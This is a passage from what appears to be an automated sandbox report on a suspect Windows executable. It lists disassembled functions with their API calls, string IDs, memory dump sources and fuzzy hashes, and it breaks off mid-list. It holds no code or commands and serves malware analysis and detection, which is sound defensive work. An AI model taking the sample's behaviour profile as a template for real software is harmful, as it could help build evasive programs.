                                            • Part of subcall function 00E2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E2B0E7
                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E294F6
                                          • GetDlgCtrlID.USER32 ref: 00E29501
                                          • GetParent.USER32 ref: 00E2951D
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E29520
                                          • GetDlgCtrlID.USER32(?), ref: 00E29529
                                          • GetParent.USER32(?), ref: 00E29545
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E29548
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: d25d97266d3c5ae0acd503fa02efb109b406ff64a4d0120b14ae1df3490b6679
                                          • Instruction ID: 2380297f7ff42a6e44990ebe227b88994badf21a22b503375957b5535bae7413
                                          • Opcode Fuzzy Hash: d25d97266d3c5ae0acd503fa02efb109b406ff64a4d0120b14ae1df3490b6679
                                          • Instruction Fuzzy Hash: 4421B270A00214BFCF05AB65DC85EFEBBA8EF45300F101156F561A72A2DB7559199B70
                                          Function 00E2955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E2B0E7
                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E295DF
                                          • GetDlgCtrlID.USER32 ref: 00E295EA
                                          • GetParent.USER32 ref: 00E29606
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E29609
                                          • GetDlgCtrlID.USER32(?), ref: 00E29612
                                          • GetParent.USER32(?), ref: 00E2962E
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E29631
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: 48ad94c6ecccf56d3a2664b122b7e37562ae85886cfa48036f32150a8a6aaf8b
                                          • Instruction ID: 08ecbced538015b549a63b09cbcdb24036ab62007db78e205e03ba0bb2940303
                                          • Opcode Fuzzy Hash: 48ad94c6ecccf56d3a2664b122b7e37562ae85886cfa48036f32150a8a6aaf8b
                                          • Instruction Fuzzy Hash: 8A21C274A00214BFDF05AB61DC85EFEBBB8EF48300F141056F921A72A2DB759919DB70
                                          Function 00E29645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32 ref: 00E29651
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00E29666
                                          • _wcscmp.LIBCMT ref: 00E29678
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E296F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend_wcscmp
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1704125052-3381328864
                                          • Opcode ID: cdaee78285b91605c1e8273c02b6b09259100195f7ae06ae766a45f5a0b0bed5
                                          • Instruction ID: fedb1aad9bba8bf77b78e88a663508bb6862f6545b2e9702b990082dc5f1923d
                                          • Opcode Fuzzy Hash: cdaee78285b91605c1e8273c02b6b09259100195f7ae06ae766a45f5a0b0bed5
                                          • Instruction Fuzzy Hash: 6A11E77664832BBAEA052621EC06DB677DCCB04364F212026FA09B50D3FE9159504678
                                          Function 00E48BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00E48BEC
                                          • CoInitialize.OLE32(00000000), ref: 00E48C19
                                          • CoUninitialize.COMBASE ref: 00E48C23
                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00E48D23
                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E48E50
                                          • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,00E62C0C), ref: 00E48E84
                                          • CoGetObject.OLE32(?,00000000,00E62C0C,?), ref: 00E48EA7
                                          • SetErrorMode.KERNEL32(00000000), ref: 00E48EBA
                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E48F3A
                                          • VariantClear.OLEAUT32(?), ref: 00E48F4A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                          • String ID:
                                          • API String ID: 2395222682-0
                                          • Opcode ID: 7d1c6c1f9c48ca20e85e5e887f18f8b6099436a1f84b9eada4f72ceaafb4c8e1
                                          • Instruction ID: 1e957aadee54314ff00339e874a99f4709c7535fc7037149712366c9cdeb4add
                                          • Opcode Fuzzy Hash: 7d1c6c1f9c48ca20e85e5e887f18f8b6099436a1f84b9eada4f72ceaafb4c8e1
                                          • Instruction Fuzzy Hash: BEC13471608305AFC704EF64D98492BB7E9FF88748F00596DF58AAB251DB31ED09CB62
                                          Function 00E34189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __swprintf.LIBCMT ref: 00E3419D
                                          • __swprintf.LIBCMT ref: 00E341AA
                                            • Part of subcall function 00DF38D8: __woutput_l.LIBCMT ref: 00DF3931
                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E341D4
                                          • LoadResource.KERNEL32(?,00000000), ref: 00E341E0
                                          • LockResource.KERNEL32(00000000), ref: 00E341ED
                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00E3420D
                                          • LoadResource.KERNEL32(?,00000000), ref: 00E3421F
                                          • SizeofResource.KERNEL32(?,00000000), ref: 00E3422E
                                          • LockResource.KERNEL32(?), ref: 00E3423A
                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E3429B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                          • String ID:
                                          • API String ID: 1433390588-0
                                          • Opcode ID: 599c2aadf580512109007a0757db65a753a3f55859eee57e7e459f9ca48abaa1
                                          • Instruction ID: 53a0f3743fdd61741ecebf0197c869105acc258d9288efcb93dbcd8475d9338d
                                          • Opcode Fuzzy Hash: 599c2aadf580512109007a0757db65a753a3f55859eee57e7e459f9ca48abaa1
                                          • Instruction Fuzzy Hash: 47319EF560521AAFDB059FA1DC48EBB7BA8EB04301F014926F905F21A0DB34EA55CBB0
                                          Function 00E316DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00E31700
                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E30778,?,00000001), ref: 00E31714
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00E3171B
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E30778,?,00000001), ref: 00E3172A
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E3173C
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E30778,?,00000001), ref: 00E31755
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E30778,?,00000001), ref: 00E31767
                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E30778,?,00000001), ref: 00E317AC
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E30778,?,00000001), ref: 00E317C1
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E30778,?,00000001), ref: 00E317CC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: 657576a4cae25b88bd15ab62176d86c38850b473b43499ce066da8b347e64b3c
                                          • Instruction ID: 27f000acaf50523de64606ae7bb6f56c20f61506041feea4c620204614e42b06
                                          • Opcode Fuzzy Hash: 657576a4cae25b88bd15ab62176d86c38850b473b43499ce066da8b347e64b3c
                                          • Instruction Fuzzy Hash: 1231BFB5610304BFEB119F26DC88B793BA9AB16716F1440ABF800F62A0D7B09D48CB60
                                          Function 00E2A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumChildWindows.USER32(?,00E2AA64), ref: 00E2A9A2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ChildEnumWindows
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 3555792229-1603158881
                                          • Opcode ID: 08d7454370edfe4961ceb1ade5f1763ad5fa937d3c87e21ce05c2867aae6a52e
                                          • Instruction ID: 0a399c69f7476a557ac6428e07bcbf6866e74d85feb10469ed2adeaeb5bd24f1
                                          • Opcode Fuzzy Hash: 08d7454370edfe4961ceb1ade5f1763ad5fa937d3c87e21ce05c2867aae6a52e
                                          • Instruction Fuzzy Hash: A591B53090061AEBCB18EF60E481BE9FB74FF44304F199129D98AB3142DF306999DBB1
                                          Function 00DD2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB), ref: 00DD2EAE
                                            • Part of subcall function 00DD1DB3: GetClientRect.USER32(?,?), ref: 00DD1DDC
                                            • Part of subcall function 00DD1DB3: GetWindowRect.USER32(?,?), ref: 00DD1E1D
                                            • Part of subcall function 00DD1DB3: ScreenToClient.USER32(?,?), ref: 00DD1E45
                                          • GetDC.USER32 ref: 00E0CF82
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E0CF95
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E0CFA3
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E0CFB8
                                          • ReleaseDC.USER32(?,00000000), ref: 00E0CFC0
                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E0D04B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: 53f2700dad12f6a6e1f2da6fe8f2806a136d8bfeee465c83c9f4ab6ada652d38
                                          • Instruction ID: 76d4facd8064d6758ed929fd10e4c7da22a63f58c7244ad9a1a0c249cd82c0b7
                                          • Opcode Fuzzy Hash: 53f2700dad12f6a6e1f2da6fe8f2806a136d8bfeee465c83c9f4ab6ada652d38
                                          • Instruction Fuzzy Hash: 9871D130500205DFCF258FA4CC84ABA7BB6FF48365F24526BFD557A2A6C7318886DB61
                                          Function 00E56FEF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E57093
                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E570A7
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E570C1
                                          • _wcscat.LIBCMT ref: 00E5711C
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E57133
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E57161
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat
                                          • String ID: -----$SysListView32
                                          • API String ID: 307300125-3975388722
                                          • Opcode ID: efac97eb5e4e72788d3195a7bcde6450af17b8b1c0fa34c91a4dea3fc95590d9
                                          • Instruction ID: 521dd178b380624c9f4059a101eb6c049ecab18fe58a4db610d391a47fe851d4
                                          • Opcode Fuzzy Hash: efac97eb5e4e72788d3195a7bcde6450af17b8b1c0fa34c91a4dea3fc95590d9
                                          • Instruction Fuzzy Hash: B241A170A04308AFDB219FA4DC85BEE77E8EF08355F10196AF984B72D1D7719D988B60
                                          Function 00E48F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E5F910), ref: 00E4903D
                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E5F910), ref: 00E49071
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E491EB
                                          • SysFreeString.OLEAUT32(?), ref: 00E49215
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                          • String ID:
                                          • API String ID: 560350794-0
                                          • Opcode ID: 4686f8e2193a386d01d159fb42f6486314383e15d21fe9dc3aad08958108699c
                                          • Instruction ID: bef568a0068decb876825026240e30ad562f0606b1a758251bde71984f2d27b0
                                          • Opcode Fuzzy Hash: 4686f8e2193a386d01d159fb42f6486314383e15d21fe9dc3aad08958108699c
                                          • Instruction Fuzzy Hash: 3CF11771A00209EFCB04DF94D888EAEB7B9FF89315F118459F915BB291DB31AE45CB60
                                          Function 00E4F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E4F9C9
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E4FB5C
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E4FB80
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E4FBC0
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E4FBE2
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E4FD5E
                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E4FD90
                                          • CloseHandle.KERNEL32(?), ref: 00E4FDBF
                                          • CloseHandle.KERNEL32(?), ref: 00E4FE36
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                          • String ID:
                                          • API String ID: 4090791747-0
                                          • Opcode ID: d5a8b152f159d7fb1e13936d762f59676bb48817720229f45725b9fc1b94fa10
                                          • Instruction ID: ee119f05bef74455ecd967b25453630566b5fb33d1bc41af81f5203301ba582c
                                          • Opcode Fuzzy Hash: d5a8b152f159d7fb1e13936d762f59676bb48817720229f45725b9fc1b94fa10
                                          • Instruction Fuzzy Hash: D0E1C031604341DFCB14EF24D491B6ABBE1EF85714F14996DF899AB2A2CB31EC44CB62
                                          Function 00DD201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DD2036,?,00000000,?,?,?,?,00DD16CB,00000000,?), ref: 00DD1B9A
                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00DD20D3
                                          • KillTimer.USER32(-00000001,?,?,?,?,00DD16CB,00000000,?,?,00DD1AE2,?,?), ref: 00DD216E
                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00E0BEF6
                                          • DeleteObject.GDI32(00000000), ref: 00E0BF6C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 2402799130-0
                                          • Opcode ID: b4423efbb364dade13ecb06579e1eb5178c20c8c392c8ba83ecf72c794da835c
                                          • Instruction ID: 1db77bf4f59165a4c437de7e54a2066f469a86d5443f5ba3e4cd6644b6bda3b2
                                          • Opcode Fuzzy Hash: b4423efbb364dade13ecb06579e1eb5178c20c8c392c8ba83ecf72c794da835c
                                          • Instruction Fuzzy Hash: F2614A31200711DFCB399F15DD48B36B7B1FB60316F14992BE582A76A0C771A895DF60
                                          Function 00E34F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E338D3,?), ref: 00E348C7
                                            • Part of subcall function 00E348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E338D3,?), ref: 00E348E0
                                            • Part of subcall function 00E34CD3: GetFileAttributesW.KERNEL32(?,00E33947), ref: 00E34CD4
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00E34FE2
                                          • _wcscmp.LIBCMT ref: 00E34FFC
                                          • MoveFileW.KERNEL32(?,?), ref: 00E35017
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
